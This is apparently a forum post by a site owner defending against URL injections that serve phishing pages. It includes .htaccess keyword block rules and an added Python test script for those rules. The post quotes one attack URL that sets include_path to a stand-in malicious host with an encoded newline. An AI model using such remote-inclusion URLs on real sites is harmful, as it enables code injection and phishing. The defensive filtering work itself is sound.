My site has been the object of numerous URL injections with the purpose of showing faux/phishing-type PayPal sites. Often the URLs will include something like this:
index.php?include_path=http://malicioussite.com/malicious_code.txt%0a???
I have filtered out the bad words in the query string (including multiple "//"s). I am having trouble removing multiple "/"s from the domain name and subdirectories. I'm not sure why the hackers are putting that in the URLs, but, when I do it, it seems to have an effect. For example,
http://mydomain.com//subdirectory//subd ... rystring=x
OR
http://mydomain.com//subdirectory//subd ... rystring=x
I realize that sending all of these to a 404 page risks thwarting harmless users, but my web host is threatening to pull the plug on my site if this continues! Here is my .htaccess as it stands now. Any suggestions would be appreciated. At this point, I'm interested in the strongest possible measures to redirect/intercept malicious URLs. I'm at a loss as to how to remove the double "/"s????
Thanks
Options +FollowSymlinks
RewriteEngine on
RewriteCond %{QUERY_STRING} chdir|upload|include_path|hack|file|http://|ftp [NC,OR]
RewriteCond %{QUERY_STRING} paypal|config|myftp|include|txt [NC]
RewriteRule (.*) 404.php
# NEXT LINE SUCCESSFULLY REMOVES MULTIPLE
# SLASHES IN QUERY_STRING.....
# IT ALSO HANDLES LINE FEEDS.....
# AND "?"s.......
RewriteCond %{QUERY_STRING} [/]{2,}|%0D|%0A|\? [NC]
RewriteRule (.*) 404.php
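
One way to see what these rules catch before deploying them, as an added example that is not part of the original post: the Python below replays the post's three QUERY_STRING patterns, plus a repeated-slash check on the request path, over a few request targets. It assumes the patterns run against the undecoded query string and that the path is inspected as the client sent it; `blocked_reasons` and every sample target except the post's own URL are constructed for illustration.

```python
import re

# The QUERY_STRING patterns from the .htaccess above; [NC] maps to re.IGNORECASE.
# The first two conditions are OR'ed into one rule and the third is its own rule,
# so a match on any of the three sends the request to 404.php.
QUERY_RULES = [
    re.compile(r"chdir|upload|include_path|hack|file|http://|ftp", re.I),
    re.compile(r"paypal|config|myftp|include|txt", re.I),
    re.compile(r"[/]{2,}|%0D|%0A|\?", re.I),
]

def blocked_reasons(target):
    """Return the reasons a raw request target would be sent to 404.php.

    Nothing is percent-decoded or normalised first: this is the assumption
    that makes "%0a" and "//" visible to the patterns at all.
    """
    path, _, query = target.partition("?")
    reasons = []
    if "//" in path:
        # Repeated slashes in the path, checked on the raw target rather
        # than on a path that has already been normalised.
        reasons.append("path: repeated slash")
    for rule in QUERY_RULES:
        match = rule.search(query)
        if match:
            reasons.append("query: " + match.group(0))
    return reasons

# Constructed sample targets; only the first mirrors the URL quoted in the post.
SAMPLES = [
    "/index.php?include_path=http://malicioussite.com/malicious_code.txt%0a???",
    "//subdirectory//page.php?id=7",
    "/profile.php?view=profile",   # harmless, but "file" is a substring
    "/index.php?page=2",
]

if __name__ == "__main__":
    for target in SAMPLES:
        reasons = blocked_reasons(target)
        print(("BLOCK " if reasons else "ALLOW ") + target)
        for reason in reasons:
            print("    " + reason)
```

The third sample shows the cost the post already anticipates: short substrings such as `file`, `txt` or `ftp` also match ordinary parameter values, so harmless requests land on the 404 page too.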